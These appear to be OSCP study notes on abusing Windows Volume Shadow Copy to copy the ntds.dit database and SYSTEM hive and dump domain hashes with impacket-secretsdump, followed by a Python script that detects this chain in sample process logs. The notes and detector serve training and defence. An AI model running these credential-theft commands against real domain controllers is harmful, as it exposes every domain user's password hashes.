OSCP Notes

Shadow Copy

Shadow Copy, a.k.a. the Volume Shadow Copy Service (VSS), is a Windows feature that creates backup snapshots of files or entire volumes while they are in use. It was originally designed for quick backups and to enable file versioning in case of accidental deletion or data corruption.

Attackers often leverage this feature to access sensitive files, such as the NTDS database (which contains domain user credentials), without alerting security systems.

Note: creating a shadow copy requires Administrator or SYSTEM privileges.

Steps for shadow copy:

  1. Create a shadow copy:

     vshadow.exe -nw -p C:

  2. Copy the ntds.dit file out of the snapshot (<shadow_path> is the shadow copy device name that vshadow prints, of the form \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN):

     copy <shadow_path>\windows\ntds\ntds.dit c:\ntds.dit.bak

  3. Export the SYSTEM hive, which is needed to decrypt the NTDS hashes:

     reg save hklm\system c:\system.bak

  4. Finally, extract the hashes using Impacket's secretsdump:

     impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
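From the defender's side, the chain above leaves a recognisable trail in process-creation telemetry. The script below is an added example, not part of the original notes: it correlates constructed Sysmon-style process-creation records per host and raises an alert when a shadow-copy creation is followed by a copy of ntds.dit, noting the SYSTEM hive export when present. The JSON field names and log lines are assumptions made up for the example.

```python
import json
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation records (one JSON object per line).
# DC01 shows the full chain from the notes above; FS02 is a benign snapshot use.
SAMPLE_LOG = r"""
{"host":"DC01","time":"10:01:05","cmd":"vshadow.exe -nw -p C:"}
{"host":"DC01","time":"10:01:30","cmd":"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\ntds\\ntds.dit c:\\ntds.dit.bak"}
{"host":"DC01","time":"10:01:45","cmd":"reg save hklm\\system c:\\system.bak"}
{"host":"FS02","time":"11:00:00","cmd":"vssadmin create shadow /for=C:"}
{"host":"FS02","time":"11:00:10","cmd":"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\users\\bob\\report.docx c:\\temp\\report.docx"}
"""

# Stages of the technique, as case-insensitive regexes over the command line.
STAGES = {
    "snapshot": re.compile(
        r"\b(vshadow(\.exe)?\b|vssadmin(\.exe)?\s+create\s+shadow"
        r"|wmic(\.exe)?\s+shadowcopy\s+call\s+create)", re.I),
    "ntds_copy": re.compile(r"ntds\.dit", re.I),
    "system_hive": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I),
}


def classify(cmd):
    """Return the stage name a command line matches, or None if it matches nothing."""
    for name, pattern in STAGES.items():
        if pattern.search(cmd):
            return name
    return None


def detect_ntds_theft(log_text):
    """Correlate stages per host, in time order as logged.

    Returns {host: [stages seen]} only for hosts where a snapshot was
    followed by an ntds.dit copy. A snapshot alone (FS02) is not alerted,
    since backup jobs create them legitimately; tune further on the
    parent process and user before deploying this in production.
    """
    seen = defaultdict(list)
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        stage = classify(rec["cmd"])
        if stage and stage not in seen[rec["host"]]:
            seen[rec["host"]].append(stage)
    return {h: s for h, s in seen.items() if s[:2] == ["snapshot", "ntds_copy"]}


if __name__ == "__main__":
    for host, stages in detect_ntds_theft(SAMPLE_LOG).items():
        print(f"ALERT {host}: shadow-copy NTDS extraction chain -> {' -> '.join(stages)}")
```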


Last updated 7 months ago